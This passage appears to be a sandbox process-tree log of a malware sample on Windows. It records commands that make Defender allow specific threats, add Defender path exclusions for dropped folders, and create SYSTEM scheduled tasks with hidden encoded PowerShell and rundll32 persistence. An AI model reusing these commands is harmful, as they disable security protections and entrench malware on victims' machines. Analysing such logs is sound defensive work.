"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
7⤵
PID:1548

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True"
4⤵
PID:868

C:\Windows\SysWOW64\cmd.exe
/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True
5⤵
PID:532

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True
6⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
PID:1936

C:\Windows\SysWOW64\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True
7⤵
PID:972

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True"
4⤵
PID:2000

C:\Windows\SysWOW64\cmd.exe
/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True
5⤵
PID:292

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True
6⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
PID:1536

C:\Windows\SysWOW64\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True
7⤵
PID:1744

C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
1⤵
PID:1636

C:\Windows\system32\taskeng.exe
taskeng.exe {BCC6CD6C-0A8F-489E-AF4D-FCC1542092DE} S-1-5-18:NT AUTHORITY\System:Service:
1⤵
PID:1568

C:\Users\Admin\AppData\Local\Temp\HIvtarFlYqBBYrrFi\mMKUVlbKUxrhtsQ\JwfUiAy.exe
C:\Users\Admin\AppData\Local\Temp\HIvtarFlYqBBYrrFi\mMKUVlbKUxrhtsQ\JwfUiAy.exe nv /site_id 767 /S
2⤵
- Executes dropped EXE
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:1448

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True" &
3⤵
PID:1232

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True"
4⤵
PID:904

C:\Windows\SysWOW64\cmd.exe
/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
5⤵
PID:740

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
6⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:1288

C:\Windows\SysWOW64\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
7⤵
PID:1532

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True"
4⤵
PID:1608

C:\Windows\SysWOW64\cmd.exe
/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True
5⤵
PID:1016

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True
6⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
PID:300

C:\Windows\SysWOW64\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True
7⤵
PID:868

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True"
4⤵
PID:812

C:\Windows\SysWOW64\cmd.exe
/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True
5⤵
PID:1876

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True
6⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
PID:1956

C:\Windows\SysWOW64\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True
7⤵
PID:1652

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gdRpesNvH" /SC once /ST 07:21:45 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
3⤵
- Creates scheduled task(s)
PID:1488

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "gdRpesNvH"
3⤵
PID:1968

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "gdRpesNvH"
3⤵
PID:1196

C:\Windows\SysWOW64\cmd.exe
cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\rUaCEWwDdnKMYjxw" /t REG_DWORD /d 0 /reg:32
3⤵
PID:1016

C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\rUaCEWwDdnKMYjxw" /t REG_DWORD /d 0 /reg:32
4⤵
PID:1536

C:\Windows\SysWOW64\cmd.exe
cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\rUaCEWwDdnKMYjxw" /t REG_DWORD /d 0 /reg:64
3⤵
PID:1996

C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\rUaCEWwDdnKMYjxw" /t REG_DWORD /d 0 /reg:64
4⤵
PID:1824

C:\Windows\SysWOW64\cmd.exe
cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\rUaCEWwDdnKMYjxw" /t REG_DWORD /d 0 /reg:32
3⤵
PID:1316

C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\rUaCEWwDdnKMYjxw" /t REG_DWORD /d 0 /reg:32
4⤵
PID:1964

C:\Windows\SysWOW64\cmd.exe
cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\rUaCEWwDdnKMYjxw" /t REG_DWORD /d 0 /reg:64
3⤵
PID:1260

C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\rUaCEWwDdnKMYjxw" /t REG_DWORD /d 0 /reg:64
4⤵
PID:1876

C:\Windows\SysWOW64\cmd.exe
cmd /C copy nul "C:\Windows\Temp\rUaCEWwDdnKMYjxw\BMHyhQcM\QPuzHCZWRccrngIn.wsf"
3⤵
PID:1800

C:\Windows\SysWOW64\wscript.exe
wscript "C:\Windows\Temp\rUaCEWwDdnKMYjxw\BMHyhQcM\QPuzHCZWRccrngIn.wsf"
3⤵
- Modifies data under HKEY_USERS
PID:1104

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ELOJFuMDhuHU2" /t REG_DWORD /d 0 /reg:32
4⤵
PID:952

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ELOJFuMDhuHU2" /t REG_DWORD /d 0 /reg:64
4⤵
PID:1840

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\WSPNEpLqQIE" /t REG_DWORD /d 0 /reg:64
4⤵
PID:1512

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\WSPNEpLqQIE" /t REG_DWORD /d 0 /reg:32
4⤵
PID:1200

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\XcjIDTjqJhZdTpTIqBR" /t REG_DWORD /d 0 /reg:32
4⤵
PID:776

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\XcjIDTjqJhZdTpTIqBR" /t REG_DWORD /d 0 /reg:64
4⤵
PID:532

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\anjFGKdzU" /t REG_DWORD /d 0 /reg:64
4⤵
PID:1600

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\anjFGKdzU" /t REG_DWORD /d 0 /reg:32
4⤵
PID:1636

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\fcsvEsvhbcUn" /t REG_DWORD /d 0 /reg:64
4⤵
PID:1012

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\fcsvEsvhbcUn" /t REG_DWORD /d 0 /reg:32
4⤵
PID:564

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\pQmgloyPupxgC" /t REG_DWORD /d 0 /reg:32
4⤵
PID:1816

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\pQmgloyPupxgC" /t REG_DWORD /d 0 /reg:64
4⤵
PID:1956

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\pDJsDjHXtdwyYAVB" /t REG_DWORD /d 0 /reg:32
4⤵
PID:1876

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\pDJsDjHXtdwyYAVB" /t REG_DWORD /d 0 /reg:64
4⤵
PID:1644

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\LocalLow\jeZaYrHiEGvsn" /t REG_DWORD /d 0 /reg:32
4⤵
PID:540

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\LocalLow\jeZaYrHiEGvsn" /t REG_DWORD /d 0 /reg:64
4⤵
PID:1668

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\HIvtarFlYqBBYrrFi" /t REG_DWORD /d 0 /reg:32
4⤵
PID:936

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\HIvtarFlYqBBYrrFi" /t REG_DWORD /d 0 /reg:64
4⤵
PID:596

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\rUaCEWwDdnKMYjxw" /t REG_DWORD /d 0 /reg:32
4⤵
PID:328

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\rUaCEWwDdnKMYjxw" /t REG_DWORD /d 0 /reg:64
4⤵
PID:292

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ELOJFuMDhuHU2" /t REG_DWORD /d 0 /reg:64
4⤵
PID:1056

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ELOJFuMDhuHU2" /t REG_DWORD /d 0 /reg:32
4⤵
PID:1820

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\WSPNEpLqQIE" /t REG_DWORD /d 0 /reg:32
4⤵
PID:1608

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\WSPNEpLqQIE" /t REG_DWORD /d 0 /reg:64
4⤵
PID:1600

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\XcjIDTjqJhZdTpTIqBR" /t REG_DWORD /d 0 /reg:32
4⤵
PID:1504

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\XcjIDTjqJhZdTpTIqBR" /t REG_DWORD /d 0 /reg:64
4⤵
PID:1160

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\anjFGKdzU" /t REG_DWORD /d 0 /reg:32
4⤵
PID:1320

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\anjFGKdzU" /t REG_DWORD /d 0 /reg:64
4⤵
PID:1664

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\fcsvEsvhbcUn" /t REG_DWORD /d 0 /reg:32
4⤵
PID:1260

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\fcsvEsvhbcUn" /t REG_DWORD /d 0 /reg:64
4⤵
PID:1148

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\pQmgloyPupxgC" /t REG_DWORD /d 0 /reg:32
4⤵
PID:1532

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\pQmgloyPupxgC" /t REG_DWORD /d 0 /reg:64
4⤵
PID:1668

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\pDJsDjHXtdwyYAVB" /t REG_DWORD /d 0 /reg:32
4⤵
PID:1208

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\pDJsDjHXtdwyYAVB" /t REG_DWORD /d 0 /reg:64
4⤵
PID:1788

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\LocalLow\jeZaYrHiEGvsn" /t REG_DWORD /d 0 /reg:32
4⤵
PID:1636

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\LocalLow\jeZaYrHiEGvsn" /t REG_DWORD /d 0 /reg:64
4⤵
PID:1820

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\HIvtarFlYqBBYrrFi" /t REG_DWORD /d 0 /reg:32
4⤵
PID:1716

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\HIvtarFlYqBBYrrFi" /t REG_DWORD /d 0 /reg:64
4⤵
PID:1196

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\rUaCEWwDdnKMYjxw" /t REG_DWORD /d 0 /reg:32
4⤵
PID:1608

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\rUaCEWwDdnKMYjxw" /t REG_DWORD /d 0 /reg:64
4⤵
PID:2040

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "jrzNdZzegeVMzeqYf" /SC once /ST 04:56:02 /RU "SYSTEM" /TR "\"C:\Windows\Temp\rUaCEWwDdnKMYjxw\EDawfRbJCwSQAxV\ANjRVCE.exe\" gh /site_id 767 /S" /V1 /F
3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:1996

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "jrzNdZzegeVMzeqYf"
3⤵
PID:1336

C:\Windows\Temp\rUaCEWwDdnKMYjxw\EDawfRbJCwSQAxV\ANjRVCE.exe
C:\Windows\Temp\rUaCEWwDdnKMYjxw\EDawfRbJCwSQAxV\ANjRVCE.exe gh /site_id 767 /S
2⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Modifies Internet Explorer settings
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
PID:2016

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True" &
3⤵
PID:2000

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True"
4⤵
PID:952

C:\Windows\SysWOW64\cmd.exe
/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
5⤵
PID:1688

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
6⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
PID:1384

C:\Windows\SysWOW64\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
7⤵
PID:1576

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True"
4⤵
PID:360

C:\Windows\SysWOW64\cmd.exe
/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True
5⤵
PID:1616

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True
6⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
PID:596

C:\Windows\SysWOW64\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True
7⤵
PID:1788

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True"
4⤵
PID:292

C:\Windows\SysWOW64\cmd.exe
/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True
5⤵
PID:1536

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True
6⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
PID:1340

C:\Windows\SysWOW64\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True
7⤵
PID:1504

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "bqZkKdgiyjBiVwZYfn"
3⤵
PID:1752

C:\Windows\SysWOW64\cmd.exe
cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32
3⤵
PID:1980

C:\Windows\SysWOW64\reg.exe
REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32
4⤵
PID:1996

C:\Windows\SysWOW64\cmd.exe
cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64
3⤵
PID:1780

C:\Windows\SysWOW64\reg.exe
REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64
4⤵
PID:1992

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\anjFGKdzU\vGFDCf.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "JRajWlGIFNTafba" /V1 /F
3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:1052

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "JRajWlGIFNTafba2" /F /xml "C:\Program Files (x86)\anjFGKdzU\PKtxXPA.xml" /RU "SYSTEM"
3⤵
- Creates scheduled task(s)
PID:812

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "JRajWlGIFNTafba"
3⤵
PID:936

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "JRajWlGIFNTafba"
3⤵
PID:1208

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "qSowRyyhLSmcKu" /F /xml "C:\Program Files (x86)\ELOJFuMDhuHU2\MXfatuS.xml" /RU "SYSTEM"
3⤵
- Creates scheduled task(s)
PID:844

